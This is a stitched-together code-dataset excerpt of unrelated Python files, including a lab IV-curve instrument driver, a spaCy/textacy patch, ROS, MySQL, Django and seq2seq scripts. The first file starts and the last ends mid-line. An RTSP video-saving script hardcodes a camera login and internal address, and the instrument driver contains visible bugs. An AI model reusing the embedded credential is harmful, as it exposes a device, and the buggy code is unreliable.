if li_model and li_add:\n # cls = importlib.import_module(li_model).Driver\n # self._li = cls(li_add)\n # else:\n # raise RuntimeError(\n # \"No valid information for Lock-in even though the mode \"\n # \"requires a lock-in. Missing:\\n\"\n # + (\"- Address\\n\" if not li_add else \"\")\n # + (\"- Model\" if not li_model else \"\")\n # )\n # li_model = self.getValue(\"Lock-In: Model\")\n # li_add = self.getValue(\"Lock-In: VISA address\")\n # if li_model and li_add:\n # cls = importlib.import_module(li_model).Driver\n # self._li = cls(li_add)\n # else:\n # raise RuntimeError(\n # \"No valid information for Lock-in even though the mode \"\n # \"requires a lock-in. Missing:\\n\"\n # + (\"- Address\\n\" if not li_add else \"\")\n # + (\"- Model\" if not li_model else \"\")\n # )\n elif self._li1 and self._li2:\n self._li1.close()\n self._li2.close()\n if value == \"Continuous\" and not self._source.support_continuous_sweeping():\n raise ValueError(\n \"The selected source does not support continuous sweeps\"\n )\n self._change_meter_acquisition_mode(value)\n elif q_name == \"Source: range\":\n with self._lock:\n self._source.set_range(value)\n elif q_name == \"Source: extrema\":\n update_ramps = True\n ext = value\n elif q_name == \"Source: reset rate\":\n update_ramps = True\n re_rate = value\n elif q_name == \"DMM: range\":\n with self._lock:\n self._meter1.set_range(value)\n self._meter2.set_range(value)\n elif q_name == \"Number of points\":\n update_ramps = True\n points = int(value)\n elif q_name == \"DMM: acquisition rate\":\n update_ramps = True\n ac_rate = value\n elif q_name == \"DMM: averaging time\":\n with self._lock:\n self._meter1.set_averaging_time(value)\n self._meter2.set_averaging_time(value)\n elif q_name == \"Lock-in: frequency\":\n with self._lock:\n self._li1.set_frequency(value)\n self._li2.set_frequency(value)\n # XXX deal with LI voltage\n elif q_name == \"Lock-in: amplitude\":\n with self._lock:\n self._li1.set_amplitude(value)\n self._li2.set_amplitude(value)\n # XXX deal with LI voltage\n elif q_name == \"Lock-in: time constant\":\n with self._lock:\n self._li1.set_tc(value)\n self._li2.set_tc(value)\n self._meter1.set_averaging_time(\n self.getValue(\"DMM: averaging time Lock-in\")\n )\n self._meter2.set_averaging_time(\n self.getValue(\"DMM: averaging time Lock-in\")\n )\n # XXX deal with LI voltage\n elif q_name == \"Lock-in: settling time\":\n with self._lock:\n self._meter1.set_averaging_time(\n self.getValue(\"DMM: averaging time Lock-in\")\n )\n self._meter2.set_averaging_time(\n self.getValue(\"DMM: averaging time Lock-in\")\n )\n\n if self.getValue(\"Acquisition mode\") == \"Continuous\" and update_ramps:\n ext = ext or self.getValue(\"Source: extrema\")\n re_rate = re_rate or self.getValue(\"Source: reset rate\")\n points = points or self.getValue(\"Number of points\")\n ac_rate = ac_rate or self.getValue(\"DMM: acquisition rate\")\n # Center the points in the window of acquisition and add padding\n self._prepare_ramp(ext, points, ac_rate, re_rate)\n\n return value\n\n def performGetValue(self, quant, options={}):\n \"\"\"Perform the Get Value instrument operation.\"\"\"\n q_name = quant.name\n\n if q_name == \"IV curve 1\":\n acq_mode = self.getValue(\"Acquisition mode\")\n ext = self.getValue(\"Source: extrema\")\n points = self.getValue(\"Number of points\")\n offset = self.getValue(\"Bias offset\")\n with self._lock:\n if acq_mode == \"Continuous\":\n data = self._perform_continuous_acquisition()\n else:\n data = self._perform_point_by_point_acquisition(\n \"without\" not in acq_mode\n )\n bias = (np.linspace(-ext, ext, points) / self.getValue(\"DC Voltage divider\"))\n self._bias = bias\n\n return quant.getTraceDict(\n data,\n x=bias,\n )\n\n if q_name == \"IV curve 2\":\n return quant.getTraceDict(\n self._IV_curve2,\n x=self._bias,\n )\n\n if q_name == \"dIdV vs V curve 1\":\n return quant.getTraceDict(\n self._li_trace1, x=self._bias\n )\n\n if q_name == \"dIdV vs V curve 2\":\n return quant.getTraceDict(\n self._li_trace2, x=self._bias\n )\n\n if q_name == \"dsigma vs V curve 1\":\n return quant.getTraceDict(\n self._didv_trace1, x=self._bias\n )\n\n if q_name == \"dsigma vs V curve 2\":\n return quant.getTraceDict(\n self._didv_trace2, x=self._bias\n )\n\n if q_name == \"Real voltagebias 1\":\n return quant.getTraceDict(\n self._realbias1, x=self._bias\n )\n\n if q_name == \"Real voltagebias 1\":\n return quant.getTraceDict(\n self._realbias2, x=self._bias\n )\n\n # For quantities corresponding to software only parameters simply\n # return the value\n elif q_name in (\n \"Acquisition mode\",\n \"Source: Model\",\n \"Source: VISA address\",\n \"DMM1: Model\",\n \"DMM1: VISA address\",\n \"DMM2: Model\",\n \"DMM2: VISA address\",\n \"Lock-In1: Model\",\n \"Lock-In1: VISA address\",\n \"Lock-In2: Model\",\n \"Lock-In2: VISA address\",\n # XXX duplicate Li voltage entries\n \"Source: extrema\",\n \"Source: reset rate\",\n \"Number of points\",\n \"DC Voltage divider\",\n \"AC Voltage divider\",\n \"Trans-impedance amplifier: gain\",\n \"Inline resistance 1\",\n \"Inline resistance 2\",\n \"Inline resistance 3\",\n \"Bias offset\",\n \"DMM: averaging time Lock-in\",\n ):\n return quant.getValue()\n\n elif q_name == \"Source: list ranges\":\n with self._lock:\n return self._source.list_ranges()\n\n elif q_name == \"Source: range\":\n with self._lock:\n return self._source.get_range()\n\n elif q_name == \"DMM: list ranges\":\n with self._lock:\n return self._meter1.list_ranges()\n\n elif q_name == \"DMM: range\":\n with self._lock:\n return self._meter1.get_range()\n\n elif q_name == \"DMM: list acquisition rates\":\n with self._lock:\n return self._meter1.list_acquisition_rates()\n\n elif q_name == \"DMM: acquisition rate\":\n with self._lock:\n return self._meter1.get_acquisition_rate()\n\n elif q_name == \"DMM: averaging time\":\n with self._lock:\n return self._meter1.get_averaging_time()\n\n elif q_name == \"Lock-in: frequency\":\n with self._lock:\n return self._li1.get_frequency()\n\n elif q_name == \"Lock-in: amplitude\":\n with self._lock:\n return self._li1.get_amplitude()\n\n elif q_name == \"Lock-in: list time constants\":\n with self._lock:\n return self._li1.list_tcs()\n\n elif q_name == \"Lock-in: time constant\":\n with self._lock:\n value = self._li1.get_tc()\n return value\n\n elif q_name == \"Lock-in: settling time\":\n with self._lock:\n value = self.getValue(\"Lock-in: settling time\")\n return value\n else:\n raise KeyError(\"Unknown quantity: %s\" % q_name)\n\n @staticmethod\n def ramp_extrema(sweep_extrema, points, padding_points):\n \"\"\"Extrema of the ramp for continuous acquisition.\n\n The value is chosen so that points are centered in each\n acquisition segment.\n\n \"\"\"\n half_step = sweep_extrema / (points - 1)\n return sweep_extrema + (2 * padding_points + 1) * half_step\n\n @staticmethod\n def ramp_speed(sweep_extrema, points, data_rate):\n \"\"\"Sweep rate given the amplitude, number of points and selected ac rate.\"\"\"\n # Adjusted by comparing curves on very different ranges so that they\n # agree and coompared to a conventional measurement\n return 2 * sweep_extrema * data_rate / points\n\n def _prepare_ramp(self, ext, points, data_rate, reset_rate):\n \"\"\"Prepare a ramp by centering the points and adding padding.\"\"\"\n # Get the source sweep resolution\n res = self._source.get_sweep_resolution()\n if \"time\" in res: # The Yokogawa has a finite time resolution of 100 ms\n possible_pads = np.arange(2, max(10, int(0.05 * points)))\n extremas = self.ramp_extrema(ext, points, possible_pads)\n times = (\n 2\n * extremas\n / self.ramp_speed(extremas, points + 2 * possible_pads, data_rate)\n )\n # This selects the padding giving us the ramping time leading to the\n # smallest error\n padding = possible_pads[np.argmin(times % res[\"time\"])]\n else:\n raise ValueError(\"Unsupported resolution format\")\n self._padding_points = padding\n\n # Center the points in the window of acquisition\n val = self.ramp_extrema(ext, points, padding)\n\n self._source.select_range(val, self.getValue(\"Source: load resistance\"))\n\n self._source.prepare_ramps(\n [\n (-val, val, self.ramp_speed(val, points + 2 * padding, data_rate)),\n (\n val,\n -val,\n self._source.get_admissible_reset_rate(reset_rate, 2 * val),\n ),\n ]\n )\n self._meter.prepare_acquisition(points + 2 * padding)\n\n def _change_meter_acquisition_mode(self, mode):\n \"\"\"Change the meter configuation based on the acquisition mode.\"\"\"\n if \"Point by point\" in mode:\n self._meter1.set_acquisition_mode(\"point by point\")\n self._meter2.set_acquisition_mode(\"point by point\")\n if \"without\" not in mode:\n self._meter1.set_averaging_time(\n self.getValue(\"DMM: averaging time Lock-in\")\n )\n self._meter2.set_averaging_time(\n self.getValue(\"DMM: averaging time Lock-in\")\n )\n else:\n if \"without\" in mode:\n self._meter1.set_averaging_time(self.getValue(\"DMM: averaging time\"))\n self._meter2.set_averaging_time(self.getValue(\"DMM: averaging time\"))\n else:\n ext = self.getValue(\"Source: extrema\")\n re_rate = self.getValue(\"Source: reset rate\")\n points = self.getValue(\"Number of points\")\n ac_rate = self.getValue(\"DMM: acquisition rate\")\n self._meter.set_acquisition_mode(\"continuous\")\n self._meter.set_acquisition_rate(ac_rate)\n self._prepare_ramp(ext, points, ac_rate, re_rate)\n\n def _perform_continuous_acquisition(self):\n \"\"\"Perform a continuous acquisition.\"\"\"\n ext = self.getValue(\"Source: extrema\")\n reset = self.getValue(\"Source: reset rate\")\n points = self.getValue(\"Number of points\")\n # Center the points in the window of acquisition\n init = self.ramp_extrema(ext, points, self._padding_points)\n\n # Should only happen on the first scan since we reset the value after\n # setting\n while self._source.is_ramping():\n sleep(0.01)\n curr = self._source.current_value()\n logger.critical(f\"{curr}\")\n if curr != -init:\n self._source.goto_value(-init, reset)\n while self._source.is_ramping():\n sleep(0.01)\n\n # The DMM is preconfigured for the right number of points, so simply arm\n self._meter.arm_device()\n\n # Start the ramp.\n self._source.start_ramp(0)\n sleep(0.1)\n\n # Wait for the data\n self._meter.wait_for_data_ready()\n while self._source.is_ramping():\n sleep(0.01)\n\n # Retrieve the data\n data = self._meter.retrieve_data()\n # Remove padding\n data = data[self._padding_points : -self._padding_points]\n\n # Reset the source so that it has time to reset\n self._source.start_ramp(1)\n\n return data\n\n def _perform_point_by_point_acquisition(self, with_li: bool):\n \"\"\"Perform a point by point acquisition.\"\"\"\n ext = self.getValue(\"Source: extrema\")\n reset = self.getValue(\"Source: reset rate\")\n points = self.getValue(\"Number of points\")\n offset = self.getValue(\"Bias offset\")\n #both_li = with_li and \"2\" in self.getValue(\"Acquisition mode\")\n\n set_points = np.linspace(-ext + offset * self.getValue(\"DC Voltage divider\"),\n ext + offset * self.getValue(\"DC Voltage divider\"), points)\n dmm_vals1 = np.empty_like(set_points)\n dmm_vals2 = np.empty_like(set_points)\n if with_li:\n li_vals1 = np.empty_like(set_points, dtype=complex)\n li_vals2 = np.empty_like(set_points, dtype=complex)\n # XXX create storage for LI 2 value\n t = self.getValue(\"Lock-in: settling time\") * self.getValue(\n \"Lock-in: time constant\"\n )\n source = self._source\n dmm1 = self._meter1\n dmm2 = self._meter1\n li1 = self._li1\n li2 = self._li2\n # XXX get LI\n\n # Ensure we are using the proper range\n self._source.select_range(\n # 10 resistance to ground of the divider\n ext + abs(offset) * self.getValue(\"DC Voltage divider\"),\n 10 * self.getValue(\"DC Voltage divider\")\n )\n\n # Should only happen on the first scan since we reset the value after\n # setting\n while self._source.is_ramping():\n sleep(3)\n # Go to the first point and wait\n source.goto_value(set_points[0], reset)\n while source.is_ramping():\n sleep(3)\n\n for i, v in enumerate(set_points):\n source.goto_value(v, reset)\n sleep(t)\n dmm_vals1[i] = dmm1.read_value()\n dmm_vals2[i] = dmm2.read_value()\n if with_li:\n li_vals1[i] = li1.read_value()\n li_vals2[i] = li2.read_value()\n # if both_li:\n # XXX get LI 2 value\n\n # Go to the first point and wait\n source.goto_value(set_points[0], reset)\n\n # Convert to current\n dmm_vals1 /= self.getValue(\"Trans-impedance amplifier: gain\")\n dmm_vals2 /= self.getValue(\"Trans-impedance amplifier: gain\")\n\n if with_li:\n self._li_trace1 = li_vals1\n self._li_trace2 = li_vals2\n # Convert AC measurement to conductance\n sigma1 = ( abs(li_vals1)\n / self.getValue(\"Trans-impedance amplifier: gain\")\n / (\n self.getValue(\"Lock-in: amplitude\")\n / self.getValue(\"AC Voltage divider\")\n )\n )\n self._didv_trace1 = (\n sigma1\n / (2 * cs.e ** 2 / cs.h)\n / (1 - sigma1 * self.getValue(\"Inline resistance\"))\n )\n self._realbias1 = (set_points / self.getValue(\"DC Voltage divider\")\n - offset\n - dmm_vals * self.getValue(\"Inline resistance\")\n )\n self._realbias2 = (set_points / self.getValue(\"DC Voltage divider\")\n - offset\n - dmm_vals * self.getValue(\"Inline resistance\")\n )\n # Conversion for both li\n self._IV_curve2 = dmm_vals2\n return dmm_vals1\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"3TIVTracer/Save/IVtracer2.py","file_name":"IVtracer2.py","file_ext":"py","file_size_in_byte":28128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"491436785","text":"# -*- coding: utf-8 -*-\nimport msgpack\nimport spacy\nimport textacy\n\nfrom spacy.language import Language as SpacyLang\nfrom spacy.tokens.doc import Doc as SpacyDoc\n\nfrom textacy import cache\nfrom textacy import compat\nfrom textacy.io.utils import open_sesame\nfrom pympler import asizeof\nimport humanfriendly\nimport os\nimport psutil\n\n# NOTE: The following code has been apdated from textacy.io.spacy.read_spacy_docs\n# The only modification is addition of arg encoding='utf8' to Unpacker()\n \ndef read_spacy_docs(fname, format=\"pickle\", lang=None):\n \"\"\"\n Read the contents of a file at ``fname``, written either in pickle or binary\n format.\n Args:\n fname (str): Path to file on disk from which data will be read.\n format ({\"pickle\", \"binary\"}): Format of the data that was written to disk.\n If 'pickle', use ``pickle`` in python's stdlib; if 'binary', use\n the 3rd-party ``msgpack`` library.\n .. warning:: Docs written in pickle format were saved all together\n as a list, which means they're all loaded into memory at once\n before streaming one by one. Mind your RAM usage, especially when\n reading many docs!\n .. warning:: When writing docs in binary format, spaCy's built-in\n ``spacy.Doc.to_bytes()`` method is used, but when reading the data\n back in :func:`read_spacy_docs()`, experimental and *unofficial*\n work-arounds are used to allow for all the docs in ``data`` to be\n read from the same file. If spaCy changes, this code could break,\n so use this functionality at your own risk!\n lang (str or ``spacy.Language``): Already-instantiated ``spacy.Language``\n object, or the string name by which it can be loaded, used to process\n the docs written to disk at ``fname``. Note that this is only applicable\n when ``format=\"binary\"``.\n Yields:\n ``spacy.Doc``: Next deserialized document.\n Raises:\n ValueError: if format is not \"pickle\" or \"binary\", or if ``lang`` is not\n provided when ``format=\"binary\"``\n \"\"\"\n if format == \"pickle\":\n with open_sesame(fname, mode='rb') as f:\n for spacy_doc in compat.pickle.load(f):\n yield spacy_doc\n elif format == \"binary\":\n if lang is None:\n raise ValueError(\n \"When format='binary', a `spacy.Language` (and its associated \"\n \"`spacy.Vocab`) is required to deserialize the binary data; \"\n \"and these should be the same as were used when processing \"\n \"the original docs!\")\n elif isinstance(lang, SpacyLang):\n vocab = lang.vocab\n elif isinstance(lang, compat.unicode_):\n vocab = cache.load_spacy(lang).vocab\n else:\n raise ValueError(\n \"lang = '{}' is invalid; must be a str or `spacy.Language`\")\n with open_sesame(fname, mode='rb') as f:\n\n unpacker = msgpack.Unpacker(f, encoding='UTF-8')\n \n for msg in unpacker:\n\n # NOTE: The following code has been adapted from spaCy's\n # built-in ``spacy.Doc.from_bytes()``. If that functionality\n # changes, the following will probably break...\n\n # Msgpack doesn't distinguish between lists and tuples, which is\n # vexing for user data. As a best guess, we *know* that within\n # keys, we must have tuples. In values we just have to hope\n # users don't mind getting a list instead of a tuple.\n if \"user_data_keys\" in msg:\n \n user_data_keys = msgpack.loads(msg[\"user_data_keys\"], use_list=False, encoding='utf-8')\n for encoding in ['utf-8', 'latin1']:\n try:\n user_data_values = msgpack.loads(msg[\"user_data_values\"], encoding=encoding)\n except:\n if encoding == 'latin1': raise\n \n user_data = {\n key: value\n for key, value in compat.zip_(user_data_keys, user_data_values)}\n else:\n user_data = None\n \n text = msg[\"text\"]\n attrs = msg[\"array_body\"]\n words = []\n spaces = []\n start = 0\n for i in compat.range_(attrs.shape[0]):\n end = start + int(attrs[i, 0])\n has_space = int(attrs[i, 1])\n words.append(text[start: end])\n spaces.append(bool(has_space))\n start = end + has_space\n\n spacy_doc = SpacyDoc(vocab, words=words, spaces=spaces, user_data=user_data)\n spacy_doc = spacy_doc.from_array(msg[\"array_head\"][2:], attrs[:, 2:])\n if \"sentiment\" in msg:\n spacy_doc.sentiment = msg[\"sentiment\"]\n if \"tensor\" in msg:\n spacy_doc.tensor = msg[\"tensor\"]\n\n yield spacy_doc\n else:\n raise ValueError(\n \"format = '{}' is invalid; value must be one of {}\".format(\n format, {\"pickle\", \"binary\"}))\n \n \n ","sub_path":"src/3_text_analysis/textacy_patch.py","file_name":"textacy_patch.py","file_ext":"py","file_size_in_byte":5415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"260698696","text":"from docx import Document\r\nfrom openpyxl import Workbook\r\n\r\nwb = Workbook()\r\nws = wb.active\r\n\r\ndocument = Document(\"論文.docx\")\r\nparagraphs = document.paragraphs\r\n\r\nheading1_style = 'Heading 1'\r\n\r\ncount = 0\r\nfor paragraph in paragraphs:\r\n if paragraph.style.name == heading1_style:\r\n count += 1\r\n ws.cell(count, 1).value = paragraph.text\r\nwb.save(\"論文見出し.xlsx\")\r\n","sub_path":"word/read_style.py","file_name":"read_style.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"75048266","text":"#! /usr/bin/env python\n\nimport rospy\nfrom std_msgs.msg import String\n\ndef run_node():\n rospy.init_node('talker_python')\n talk_pub = rospy.Publisher('important_message', String, queue_size=100)\n \n rate = rospy.Rate(2)\n \n count = 0\n while not rospy.is_shutdown():\n if count % 2 == 0:\n msg = 'count is : ' + str(int(count/2))\n else:\n msg = 'count is : ' + str(int(count/2)) + \" and a half\"\n count = count + 1\n \n talk_pub.publish(msg)\n rate.sleep()\n\nif __name__ == \"__main__\":\n try:\n run_node()\n except rospy.ROSInterruptException:\n pass","sub_path":"talk.py","file_name":"talk.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"276670746","text":"\nimport MySQLdb as mdb\nfrom parseConfig import parseconfig\n\nconfig = parseconfig('my.conf','mysqld')\nconn = mdb.connect(\n host=config['host'],\n user=config['user'], \n passwd=config['password'],\n db=config['db'],\n charset=config['charset'])\n\ncursor = conn.cursor()\n\nconn.autocommit(1)\n\n\ndef execute_sql(sql):\n return cursor.execute(sql)\n\ndef select_all_result(sql):\n cursor.execute(sql)\n return cursor.fetchall()\n\ndef select_one_result(sql):\n cursor.execute(sql)\n return cursor.fetchone()\n\ndef close_db():\n cursor.close()\n conn.close()\n","sub_path":"lesson9/fengxiaoli/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"582014689","text":"class Store(object):\n \"\"\"docstring for Store.\"\"\"\n data = []\n\n def __init__(self, n):\n super(Store, self).__init__()\n for i in range(n):\n print('Producto', i+1)\n c = float(input('Cantidad: '))\n p = float(input('Precio: '))\n self.data.append(c*p)\n\n def total(self):\n result = 0\n for i in range(len(self.data)):\n result = self.data[i]+result\n return result\n\n def cambio(self):\n billetes_y_monedas = [500, 200, 100, 50, 20, 10, 5, 2, 1, 0.50, 0.20, 0.10, 0.01]\n monedero = []\n dato = self.total()\n try:\n parte_decimal = float('0.'+dato[1])\n except:\n parte_decimal = 0.0\n\n parte_entera = dato\n\n for i in billetes_y_monedas:\n unidades, resto = divmod(parte_entera, i)\n if unidades != 0:\n monedero.append((i, unidades))\n parte_entera = resto\n\n if parte_decimal > 0:\n for i in billetes_y_monedas:\n unidades, resto = divmod(parte_decimal, i)\n if unidades != 0:\n monedero.append((i,unidades))\n parte_decimal = round(resto,2)\n\n cadena = ''\n for i in monedero:\n if i[0] >= 5: cadena += '%d billete/s de %d' % (i[1],i[0])\n if i[0] < 5: cadena += '%d moneda/s de %s' % (i[1],i[0])\n cadena += '\\n'\n return cadena\nn = int(input('Numero de productos diferentes: '))\ns = Store(n)\nprint('Cambio\\n', s.cambio())\n","sub_path":"second/first/examen3.py","file_name":"examen3.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"617349273","text":"# coding=utf-8\n\"\"\"Performs face detection in realtime.\n\nBased on code from https://github.com/shanren7/real_time_face_recognition\n\"\"\"\n# MIT License\n#\n# Copyright (c) 2017 François Gervais\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport argparse\nimport sys\nimport time\nimport cv2\nimport os\nimport shutil\nimport mysql.connector\nfrom scipy import misc\n\n# 初始日期时间\nnow_date = time.strftime('%Y-%m-%d', time.localtime(time.time()))\nnow_hour = time.strftime('%H', time.localtime(time.time()))\n\nVIDEO_STREAM = \"rtsp://admin:ddd123456@10.245.135.26:554\"\nIMGS_DIR = './videos/'\nMY_COLOR = (0, 255, 0)\n\ndef main(args):\n\n frame_interval = 4 # Number of frames after which to run face detection\n fps_display_interval = 10 # seconds\n frame_rate = 25\n frame_count = 0\n\n # 当前最新视频\n video_capture = cv2.VideoCapture(VIDEO_STREAM)\n # 定义录制视频格式 motion-jpeg codec\n sp_typ = cv2.VideoWriter_fourcc('D', 'I', 'V', 'X')\n #sp_typ = cv2.VideoWriter_fourcc('','','','')\n now_second = time.strftime('%M%s', time.localtime(time.time()))\n out = cv2.VideoWriter('save_video/'+now_date+now_hour+now_second+'.avi', sp_typ, 25.0, (2560, 1440))\n while True:\n # Capture frame-by-frame\n ret, frame = video_capture.read()\n # cv2.imwrite('save_video/'+now_date+now_second+'.jpg',frame)\n out.write(frame)\n #cv2.imshow('video',frame)\n frame_count += 1\n if cv2.waitKey(1) & 0xFF == ord('q'): \n break \n\n\n\ndef parse_arguments(argv):\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--debug', action='store_true',\n help='Enable some debug outputs.')\n parser.add_argument('--image', action='store_true',\n help='Process images instead of video.')\n return parser.parse_args(argv)\n\n\nif __name__ == '__main__':\n main(parse_arguments(sys.argv[1:]))\n","sub_path":"video_saver.py","file_name":"video_saver.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"214860271","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework import viewsets\nfrom rest_framework import permissions\nimport schedule\nimport time\nimport xlwt\nimport datetime\nfrom django.utils.html import strip_tags\nfrom django.http import HttpResponse\nfrom rest_framework.generics import (CreateAPIView, DestroyAPIView,\n ListAPIView, RetrieveAPIView,\n RetrieveUpdateAPIView)\nfrom taskapp.models import Role,Employee,Task, Comments\nfrom taskapp.serializers import TaskSerializer, CommentsSerializer\nfrom employeetask import settings\n\nclass TaskCreateView(CreateAPIView):\n\n serializer_class = TaskSerializer\n\n def perform_create(self, serializer):\n try:\n self.id = self.kwargs.get('id')\n employee_obj = Employee.objects.get(id=self.id)\n serializer.save(employee=employee_obj,created_by=employee_obj.email,updated_by=employee_obj.email)\n except Exception as e:\n print(e)\n\nclass TaskListView(ListAPIView):\n\n serializer_class = TaskSerializer\n\n def get_queryset(self, *args, **kwargs):\n self.id = self.kwargs.get(\"id\")\n try:\n employee = Employee.objects.get(id=self.id)\n query_set = Task.objects.filter(employee = employee)\n return query_set\n except Exception as e:\n print(e)\n\nclass EmployeeTaskRolewiseListView(ListAPIView):\n\n serializer_class = TaskSerializer\n\n def get_queryset(self, *args, **kwargs):\n self.role = self.kwargs.get(\"role\")\n try:\n role=Role.objects.get(name=self.role)\n employee = Employee.objects.filter(role = role)\n for each_employee in employee:\n query_set = Task.objects.filter(employee = each_employee)\n return query_set\n except Exception as e:\n print(e)\n\nclass CommentsCreateView(CreateAPIView):\n serializer_class = CommentsSerializer\n\n def perform_create(self, serializer):\n id = self.kwargs.get('id')\n obj = Task.objects.get(id=id)\n comment_data = self.request.data.get('comment_text')\n if comment_data:\n comment_obj = Comments.objects.create(comment_text=comment_data,\n created_by=self.request.user, updated_by=self.request.user)\n obj.comment.add(comment_obj)\n return obj\n\n# EXCEL CREATION USING SCHEDULER\n# def download_task_xls():\n# response = HttpResponse(content_type='application/ms-excel')\n# response['Content-Disposition'] = 'attachment; filename=\"Task - Overview.xls\"'\n#\n# wb = xlwt.Workbook(encoding='utf-8')\n# ws = wb.add_sheet('Task')\n#\n# # Sheet header, first row\n# row_num = 0\n#\n# font_style = xlwt.XFStyle()\n# font_style.font.bold = True\n# font_style.num_format_str = 'yyyy-mm-dd'\n#\n# task_obj = Task.objects.all()\n# header = ['employee_name','title', 'start_date', 'end_date']\n# columns = header\n# for col_num in range(len(columns)):\n# ws.write(row_num, col_num, columns[col_num], font_style)\n# survey_dict = []\n#\n# for each in task_obj:\n# print(each.employee)\n# survey_dict.append(\n# {'employee_name':each.employee,'Task': each.title, 'start_date': each.start_date, 'end_date': each.end_date})\n# task_list = []\n# for each in survey_dict:\n# task_list.append(list(each.values()))\n# task_list_updated = task_list[::-1]\n# task_list_updated = [[date.strftime(\"%Y-%m-%d %H:%M\") if isinstance(date, datetime.datetime) else date for date in row] for row\n# in task_list_updated]\n# for row in task_list_updated:\n# row_num += 1\n# for col_num in range(len(row)):\n# row[col_num] = strip_tags(row[col_num])\n# ws.write(row_num, col_num, row[col_num], font_style)\n# now = datetime.datetime.now()\n# wb.save('task_sheet_{}.xls'.format(now))\n# print(response)\n# return response\n#\n# schedule.every(1).seconds.do(download_task_xls)\n# # schedule.every().hour.do(download_survey_xls)\n# while True:\n# # Checks whether a scheduled task\n# # is pending to run or not\n# schedule.run_pending()\n# time.sleep(1)\n\n\n\n","sub_path":"taskapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"390762982","text":"#!/usr/bin/env python\n# -*- coding: gbk -*-\n# ==============================================================================\n# \\file predict.py\n# \\author chenghuige \n# \\date 2016-10-19 06:54:26.594835\n# \\Description \n# ==============================================================================\n\n \nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\n#FIXME: attention will hang..., no attention works fine\n#flags.DEFINE_string('model_dir', '/home/gezi/temp/textsum/model.seq2seq.attention/', '')\nflags.DEFINE_string('model_dir', '/home/gezi/temp/textsum/model.seq2seq/', '')\nflags.DEFINE_string('vocab', '/home/gezi/temp/textsum/tfrecord/seq-basic.10w/train/vocab.txt', 'vocabulary file')\nflags.DEFINE_boolean('debug', False, '')\n\nimport sys, os, math\nimport gezi, melt\nimport numpy as np\n\nfrom deepiu.util import text2ids\n\nimport conf \nfrom conf import TEXT_MAX_WORDS, INPUT_TEXT_MAX_WORDS, NUM_RESERVED_IDS, ENCODE_UNK\n\n#TODO: now copy from prpare/gen-records.py\ndef _text2ids(text, max_words):\n word_ids = text2ids.text2ids(text, \n seg_method=FLAGS.seg_method, \n feed_single=FLAGS.feed_single, \n allow_all_zero=True, \n pad=False)\n word_ids = word_ids[:max_words]\n word_ids = gezi.pad(word_ids, max_words, 0)\n\n return word_ids\n\ndef predict(predictor, input_text):\n word_ids = _text2ids(input_text, INPUT_TEXT_MAX_WORDS)\n print('word_ids', word_ids, 'len:', len(word_ids))\n print(text2ids.ids2text(word_ids))\n\n #tf.while_loop has debug problem ValueError: Causality violated in timing relations of debug dumps: seq2seq/main/decode_4/dynamic_rnn_decoder/rnn/while/Merge_7 (1489649052260629): these input(s) are not satisfied: [(u'seq2seq/main/decode_4/dynamic_rnn_decoder/rnn/while/Enter_7', 0), (u'seq2seq/main/decode_4/dynamic_rnn_decoder/rnn/while/NextIteration_7', 0)\n #https://github.com/tensorflow/tensorflow/issues/8337 From your error message, it appears that you are using tf.while_loop. Can you try setting its paralle_iterations parameter to 1 and see if the error still happens?\n #There may be a bug in how tfdbg handles while_loops with parallel_iterations > 1.\n #I think it might be a GPU thing.\n #The example below errors if run as python tf_8337_minimal.py but is fine is run as CUDA_VISIBLE_DEVICES=-1 \n timer = gezi.Timer()\n text, score = predictor.inference(['text', 'text_score'], \n feed_dict= {\n 'seq2seq/model_init_1/input_text:0': [word_ids]\n })\n \n for result in text:\n print(result, text2ids.ids2text(result), 'decode time(ms):', timer.elapsed_ms())\n \n timer = gezi.Timer()\n texts, scores = predictor.inference(['beam_text', 'beam_text_score'], \n feed_dict= {\n 'seq2seq/model_init_1/input_text:0': [word_ids]\n })\n\n texts = texts[0]\n scores = scores[0]\n for text, score in zip(texts, scores):\n print(text, text2ids.ids2text(text), score)\n\n print('beam_search using time(ms):', timer.elapsed_ms())\n\n\ndef predicts(predictor, input_texts):\n word_ids_list = [_text2ids(input_text, 